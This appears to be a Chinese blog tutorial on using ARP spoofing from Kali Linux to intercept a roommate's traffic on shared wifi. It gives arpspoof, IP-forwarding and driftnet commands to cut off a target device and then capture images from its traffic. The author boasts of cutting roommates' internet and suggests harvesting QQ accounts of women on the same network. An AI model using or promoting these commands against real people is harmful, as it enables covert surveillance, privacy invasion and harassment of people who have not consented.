实战演练|如何通过wifi知道室友在网上看些啥

至少我们曾经在一起过。

来自：一言

var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();

前言

周六周日放假回来不知道干啥，然后室友最近很闹，让我半夜睡不着，就起来把他们的网断了[aru_34]（我一个学计算机的，租房子肯定得先控制路由器嘛[aru_24]），然后第二天起来把网给他们恢复了，特意出个教程，教大家如何在同一局域网下，知道别人在网上做些啥~~[aru_13]，也可以用这招获取到和你连同一wifi的妹子QQ哦~~

准备工具：kali系统一个，笔记本一台。（让kali与笔记本进行桥接，处于同一局域网，也可以给kali加个usb网卡）

网络信息：网关：192.168.124.1    kali的ip：192.168.124.20    目标ip（一个魅族手机[aru_12]）：192.168.124.19   （这个ip是我控制了路由器，直接在路由器面板看的，大家也可以通过nmap扫描出来）

攻击开始

1.先进行断网攻击，也是ARP欺骗（代码如下，不能关闭）：

arpspoof -i 网卡 -t 目标ip 网关

（提醒：里面的中文汉字需要替换相应的参数）。输入后，对方的电脑/手机会断网，我们要快速输入下面这个代码，对方就可以重新上网，但是流量会经过我的网卡。

2.流量分发（新建立一个窗口代码如下）：

echo 1 >/proc/sys/net/ipv4/ip_forward

3.抓取图片

driftnet  -i eth0

最后

只是一个无聊的小测试，大佬们都玩烂了~~看看就行了。过几天写个dns劫持教程娱乐娱乐~~~[aru_21]